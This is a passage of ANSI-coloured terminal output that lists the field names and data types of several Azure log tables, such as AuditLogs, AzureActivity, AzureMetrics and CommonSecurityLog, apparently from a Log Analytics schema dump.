\u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ResolvedBy\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RootObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskConnectionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskWorkItemLink\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceDeskWorkItemType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceFullName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StateType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StatusDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThresholdOperator\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ThresholdValue\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TicketId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeLastModified\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeRaised\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeResolved\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TriggerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Url\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ValueDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ValueFlags\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ValueFlagsDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AppCenterError\"\u001b[39;49;00m: {\n        \u001b[94m\"Annotation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorClass\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorFile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorLine\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorMethod\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExceptionType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"JailBreak\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"LastErrorAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Model\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Oem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OsVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SchemaType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SymbolicatedAt\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserString\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AuditLogs\"\u001b[39;49;00m: {\n        \u001b[94m\"AADOperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AADTenantId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityDateTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityDisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalDetails\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"Id\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Identity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InitiatedBy\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Location\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoggedByService\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Result\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResources\"\u001b[39;49;00m: \u001b[33m\"dynamic\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AutoscaleEvaluationsLog\"\u001b[39;49;00m: {\n        \u001b[94m\"AutoscaleMetricName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AvailabilitySet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CloudServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CloudServiceRole\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CoolDown\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CurrentInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DefaultInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"DeploymentSlot\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EstimateScaleResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EvaluationResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EvaluationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"InstanceUpdateReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionOperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionOperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastScaleActionTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MaximumInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"MetricData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MetricEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MetricNamespace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MetricStartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"MetricTimeGrain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinimumInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NewInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ObservedValue\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Operator\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Profile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfileEvaluationTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ProfileSelected\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"Projection\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SelectedAutoscaleProfile\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServerFarm\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShouldUpdateInstance\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SkipCurrentAutoscaleEvaluation\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SkipRuleEvaluationForCooldown\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Threshold\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"TimeAggregationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGrainStatistic\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Webspace\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AutoscaleScaleActionsLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAsyncScaleActionJob\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"CreatedAsyncScaleActionJobId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CurrentInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"NewInstanceCount\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionMessage\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionOperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleActionOperationStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScaleDirection\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureActivity\"\u001b[39;49;00m: {\n        \u001b[94m\"ActivityStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivityStatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ActivitySubstatusValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Authorization\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Caller\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventSubmissionTimestamp\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"HTTPRequest\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationNameValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProviderValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureDiagnostics\"\u001b[39;49;00m: {\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RawData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_schema_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"code_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_actionTrackingId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_clientTrackingId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"correlation_clientTrackingId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"endTime_t\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"error_code_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"error_message_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_actionName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_location_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_originRunId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_resourceGroupName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_runId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_subscriptionId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_triggerName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_workflowId_g\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"resource_workflowName_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"startTime_t\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"status_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"tags_LogicAppsCategory_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"workflowId_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"AzureMetrics\"\u001b[39;49;00m: {\n        \u001b[94m\"Average\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"CallerIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Confidence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Count\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"FirstReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IndicatorThreatType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsActive\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LastReportedDateTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaliciousIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Maximum\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"MetricName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Minimum\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPCountry\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLatitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIPLongitude\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TLPLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGrain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Total\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UnitName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"_ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"CommonSecurityLog\"\u001b[39;49;00m: {\n        \u001b[94m\"Activity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalExtensions\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ApplicationProtocol\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CommunicationDirection\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationDnsDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationHostName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DestinationMACAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        